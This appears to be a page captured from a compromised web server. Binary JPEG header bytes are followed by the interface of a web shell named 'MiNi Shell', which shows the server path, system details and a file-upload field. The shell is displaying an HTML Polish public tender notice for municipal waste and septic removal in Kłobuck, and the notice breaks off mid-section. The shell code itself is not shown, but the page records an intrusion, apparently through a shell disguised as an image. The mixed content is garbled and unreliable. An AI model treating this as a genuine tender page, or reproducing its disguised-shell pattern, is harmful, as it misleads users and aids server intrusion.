JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241126/0061749601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usuwanie i zagospodarowanie niesegregowanych (zmieszanych) odpadów komunalnych w tym odpady z targowisk oraz nieczystości ciekłych z posesji będących w zarządzie Ośrodka Sportu i Rekreacji w Kłobucku. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK SPORTU I REKREACJI W KŁOBUCKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 150402660</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">SPORTOWA 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kłobuck</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@osirklobuck.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.osirklobuck.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usuwanie i zagospodarowanie niesegregowanych (zmieszanych) odpadów komunalnych w tym odpady z targowisk oraz nieczystości ciekłych z posesji będących w zarządzie Ośrodka Sportu i Rekreacji w Kłobucku. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-56931527-3c4e-45a5-b762-a4ff65741d2e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00617496</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00590391/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usuwanie i zagospodarowanie niesegregowanych (zmieszanych) odpadów komunalnych oraz nieczystości ciekłych z posesji będących w zarządzie Ośrodka Sportu i Rekreacji w Kłobucku.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-56931527-3c4e-45a5-b762-a4ff65741d2e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Wykonawcami będzie przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz pocztą<br/>elektroniczną na adres e-mail<br/>Zamawiającego: biuro@osirklobuck.pl oraz adresy e-mail Wykonawców podane w formularzach ofertowych. Na wskazany<br/>adres e-mail Zamawiającego.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>3. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>5. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>6. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>7. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>sekretariat@gminaklobuck.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).<br/>8. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe w tym oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy,<br/>zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się<br/>w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego<br/>2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2023r. poz. 57 z późn. zm.), z<br/>zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>9. Zamawiający informuje, iż w przypadku przesyłania przez Wykonawcę dokumentów elektronicznych skompresowanych (w tym<br/>oferty przetargowej) dopuszczone są wyłącznie formaty danych wskazane w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia<br/>2012r. (t.j. Dz.U. z 2017r., poz. 2247) w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów<br/>publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. Powyższe<br/>oznacza, iż Zamawiający nie dopuszcza przysyłania dokumentów elektronicznych (w tym oferty) skompresowanych formatem .rar<br/>10. Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 1 niniejszego rozdziału SWZ, przekazywane w postępowaniu<br/>o udzielenie zamówienia, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na<br/>podstawie art. 18 ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako<br/>tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, wskazanych przez<br/>Zamawiającego w niniejszej SWZ.<br/>Pozostałe informacje w rozdziale XIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 oraz art. 15 ust. 1 i 3 Rozporządzenia Parlamentu i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej RODO),<br/>obowiązującego od 25 maja 2018 r., informuję, iż:<br/>• Administratorem Pani/Pana danych osobowych jest Ośrodek Sportu i Rekreacji Jego przedstawicielem jest Aleksandra Cnota-<br/>Mikołajec, z którym można się skontaktować za pomocą adresu mailowego: aleksandra@eduodo.pl<br/>• W podmiocie wyznaczona jest osoba nadzorująca przestrzeganie zasad ochrony danych osobowych - Inspektor Ochrony Danych<br/>Osobowych, z którym można się skontaktować za pomocą adresów mailowych: aleksandra@eduodo.pl lub iod@eduodo.pl .<br/>• Pani/Pana dane osobowe przetwarzane będą w związku z realizacją obowiązku prawnego ciążącego na administratorze na<br/>podstawie art. 6 ust. 1 lit. c ogólnego rozporządzenia Parlamentu Europejskiego i Rady UE o ochronie danych osobowych z dnia 27<br/>kwietnia 2016 r., ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, ustawy z dnia 27 sierpnia 2009 r. o finansach<br/>publicznych oraz ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej.<br/>• Pani/Pana dane osobowe przetwarzane są w celu prowadzenia postępowania wraz z nadzorem o udzielenie zamówienia. Dane<br/>osobowe przetwarzane będą także w celu przeprowadzenia przyszłych badań naukowych, historycznych, czy statystycznych.<br/>• Odbiorcami Pani/Pana danych osobowych mogą być:<br/>7. osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 i art. 96 ust. 3 ustawy z dnia 29<br/>stycznia 2004 r. – Prawo zamówień publicznych.<br/>Więcej w rozdziale XXXII SWZ<br/>INFORMACJA DOTYCZĄCA OCHRONY DANYCH ODOBOWYCH – RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OSiR.251.003.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach niniejszego zamówienia Wykonawca usługi zobowiązany jest do:<br/>1. Nieodpłatnego dostarczenia (we wskazane miejsca) na zasadzie umowy użyczenia, pojemników na odpady komunalne w<br/>następujących ilościach i o następujących wielkościach:<br/>- 7 pojemników o pojemności 1100 litrów<br/>- 3 pojemniki o pojemności 240 litrów<br/>- 5 pojemników o pojemności 2500 litrów.<br/>2. Odbioru i zagospodarowaniu zmieszanych odpadów komunalnych z posesji będących w zarządzie Ośrodka Sportu i<br/>Rekreacji w Kłobucku.<br/>3. Nieodpłatnego dostarczenia (we wskazane miejsca) na zasadzie umowy użyczenia, 3 przenośnych kabin toaletowych<br/>typu TOI TOI.<br/>4. Serwisowania oraz usuwania nieczystości ciekłych z przenośnych kabin toaletowych typu TOI TOI.<br/>5. Opróżniania zbiornika bezodpływowego zlokalizowanego w Libidzy przy Wiejskim Ośrodku Sportu i Rekreacji przy<br/>pomocy wozu asenizacyjnego o pojemności 5 m3.<br/>3.2 Częstotliwość odbioru odpadów komunalnych: 520 razy pojemnik 2500 l, 214 razy 1100 l, 84 razy pojemnik 240 l<br/>1) Kłobuck, ul. Sportowa 14<br/>- 1 pojemnik 1100 l. wywóz w miesiącach: I, II, III, IV, XI, XII z częstotliwością raz na dwa tygodnie (piątek), co daje 13<br/>wywozów, 13 pojemników.<br/>- 2 pojemniki 1100 l. wywóz w miesiącach: V, VI, VII, VIII, IX, X z częstotliwością raz w tygodniu (piątek), co daje 26<br/>wywozów po 2 pojemniki w sumie 52 pojemniki;<br/>oraz<br/>- 3 pojemniki 240 l, wywóz z częstotliwością raz na 2 tygodnie (piątek), co daje 26 wywozów, 78 pojemników plus 6<br/>pojemników co daje łącznie 84 pojemniki.<br/>2) Kłobuck, ul. Targowa<br/>- 5 pojemników 2500 l wywóz z częstotliwością 2 razy w tygodniu (wtorek, czwartek), co daje 104 rocznie razy 5 pojemników<br/>w sumie 520 wywozów;<br/>3) Kłobuck, ul. Zamkowa 4<br/>- 1 pojemnik 1100 l wywóz z częstotliwością raz w tygodniu, co daje 52 wywozy, 52 pojemniki.<br/>4) Kłobuck, ul. Stawowa zbiornik Zakrzew<br/>- 2 pojemniki 1100 l. wywóz w miesiącach V, IX z częstotliwością jeden raz w tygodniu (piątek), co daje 9 wywozów, 18<br/>pojemników.<br/>natomiast w miesiącach VI, VII, VIII wywóz z częstotliwością 2 razy w tygodniu (poniedziałek, piątek), co daje 26 wywozów,<br/>52 pojemniki.<br/>- 1 pojemnik 1100 l wywóz w miesiącach: I, II, III, IV, X, XI, XII z częstotliwością 1 raz w miesiącu ( połowa miesiąca), co<br/>daje 7 wywozów, 7 pojemników.<br/>5) Łobodno, Baza Sportowo-Rekreacyjna, ul. Prusa w Łobodnie<br/>- 1 pojemnik 1100 l. wywóz z częstotliwością raz w miesiącu, co daje 14 wywozów, 14 pojemników.<br/>6) Libidza, Wiejski Ośrodek Sportu i Rekreacji w Libidzy<br/> 1 pojemnik 1100 l. wywóz w miesiącach IV, VI, VIII, X, XII co daje 6 wywozów, 6 pojemników.<br/>7) świetlica wiejska w Gruszewni<br/> 1 pojemnik 240 l. wywóz w miesiącach III, V, VII, VIII, IX, XII co daje 6 wywozy, 6 pojemników.<br/>3.3 Częstotliwość odbioru nieczystości ciekłych i serwisów kabin toaletowych typu TOI TOI:<br/>Nieodpłatne dostarczanie we wskazane miejsca - na zasadzie umowy użyczenia - 2 toalet typu TOI TOI oraz usuwaniu<br/>nieczystości ciekłych ze zbiorników bezodpływowych, a także utrzymaniu czystości i opróżnianiu nieczystości ciekłych z<br/>znajdujących się na terenie posesji będących w zarządzie Ośrodka Sportu i Rekreacji w Kłobucku.<br/>1) Kłobuck, ul. Stawowa zbiornik Zakrzew<br/>Na teren zbiornika należy dostarczyć i ustawić we wskazanym miejscu, kabinę toaletową typu TOI TOI, którą należy<br/>opróżniać z następującą częstotliwością:<br/> - w miesiącach V, VI, i IX - 1 raz w tygodniu (w piątek) co daje 14 wywozów.<br/> - w miesiącach VII, VIII – 2 razy w tygodniu (poniedziałek, piątek) co daje 17 wywozów.<br/>2) Kłobuck, ul. Sportowa 14<br/>Na teren OSiR należy dostarczyć i ustawić we wskazanym miejscu, kabinę toaletową typu TOI TOI, którą w miesiącach V,<br/>VI, VII, VII, IX, X należy opróżniać z częstotliwością raz w miesiącu, co daje 6 wywozów, po 1 kabinie.<br/>Łącznie 37 serwisów kabin toaletowych typu TOI TOI.<br/>3.4 Częstotliwość opróżniania zbiornika bezodpływowego:<br/>1) Wiejskim Ośrodek Sportu i Rekreacji w Libidzy<br/>Bezodpływowy zbiornik należy przy pomocy pojazdu asenizacyjnego o pojemności 5 m3 opróżniać z częstotliwością trzy<br/>razy w roku w miesiącach V, VIII, XI, łącznie 15 m3.<br/>2) Świetlica wiejska w Gruszewni<br/>Bezodpływowy zbiornik należy przy pomocy pojazdu asenizacyjnego o pojemności 5 m3 opróżniać z częstotliwością trzy<br/>razy w roku w miesiącach V, VIII, XI, łącznie 15 m3.<br/>Łącznie odbiór 30 m3 nieczystości płynnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <p class="mb-0">90400000-1 - Usługi utylizacji nieczystości</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.1 w zakresie KRYTERIUM 1 - CENA Kc(C)<br/>Każdy z Wykonawców w poszczególnych kryteriach otrzyma odpowiednią liczbę punktów, wyliczoną w następujący sposób:<br/>a) cena ofertowa - wg następującego wzoru:<br/>Cn K(c) = ----- x 100<br/>Cb<br/>gdzie poszczególne litery oznaczają:<br/>K(c) – liczba punktów,<br/>Cn – cena ofertowa najniższa spośród wszystkich rozpatrywanych i nieodrzuconych ofert,<br/>Cb – cena ofertowa oferty badanej (przeliczanej),<br/>2.2. W zakresie KRYTERIUM 2 – ASPEKT ŚRODOWISKOWY KA(A)<br/>Zamawiający w ramach niniejszego kryterium będzie przyznawał dodatkowe punkty za wykazanie przez Wykonawcę, że samochody<br/>specjalistyczne, za pomocą których będzie on wykonywał usługę odbioru odpadów komunalnych od właścicieli z terenu gminy<br/>Kłobuck spełniają normy emisji spalin EURO 4, EURO 5 lub EURO 6.<br/>W przypadku, gdy Wykonawca wykaże, że wśród samochodów specjalistycznych i innych, spełniających wymagania techniczne<br/>określone przepisami ustawy prawo o ruchu drogowym oraz innymi przepisami szczególnymi, a przede wszystkim, rozporządzeniem<br/>Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od<br/>właścicieli nieruchomości, którymi dysponuje lub będzie dysponował w celu wykonania usługi odbioru odpadów komunalnych<br/>posiada takie, które spełniają normy emisji spalin EURO 4, EURO 5 lub EURO 6, to otrzyma następującą liczbę punktów:<br/>1) za posiadanie pierwszego samochodu spełniającego normy:<br/>a) EURO 6 - otrzyma 50 punktów,<br/>b) EURO 5 – otrzyma 25 punktów,<br/>c) EURO 4 i niżej – otrzyma 0 punktów;<br/>2) za posiadanie drugiego samochodu spełniającego normy:<br/>d) EURO 6 - otrzyma 50 punktów,<br/>e) EURO 5 – otrzyma 25 punktów,<br/>f) EURO 4 i niżej – otrzyma 0 punktów;<br/>Zamawiający przewiduje, że w niniejszym kryterium Wykonawca może uzyskać max. 100 punktów, przy czym znaczenie<br/>procentowe tego kryterium wynosi 40%.<br/>Dla przeprowadzenia oceny ofert (tj. uzyskania określonej liczby punktów w ramach niniejszego kryterium) każdy Wykonawca<br/>zobowiązany jest:<br/>a) wskazać w Formularzu ofertowym liczbę samochodów do odbioru odpadów komunalnych z terenu gminy Kłobuck spełniających<br/>normy emisji spalin EURO 6, EURO 5 i EURO 4;<br/>b) przedłożyć przy ofercie dokumenty takie jak: deklaracje producenta, certyfikaty, homologacje, z których będzie można odczytać,<br/>że samochody przeznaczone do odbioru odpadów komunalnych z terenu gminy Kłobuck spełniają normy emisji spalin EURO 4,<br/>EURO 5 lub wyższej.<br/>7. Za najkorzystniejszą ofertę zostanie uznana ta spośród nieodrzuconych ofert, która uzyska najwyższą łączną ocenę w trzech<br/>kryteriach oceny obliczoną wg wzoru:<br/>KIP = Kc(C) x 60% + Ka(A) x 40%<br/>gdzie symbol KIP oznacza końcową ilość punktów,<br/>8. Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam<br/>bilans ceny i kryterium gwarancji jakości, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt środowiskowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.1. Zdolność do występowania w obrocie gospodarczym<br/>Zamawiający nie określa szczegółowych warunków udziału w postępowaniu w tym 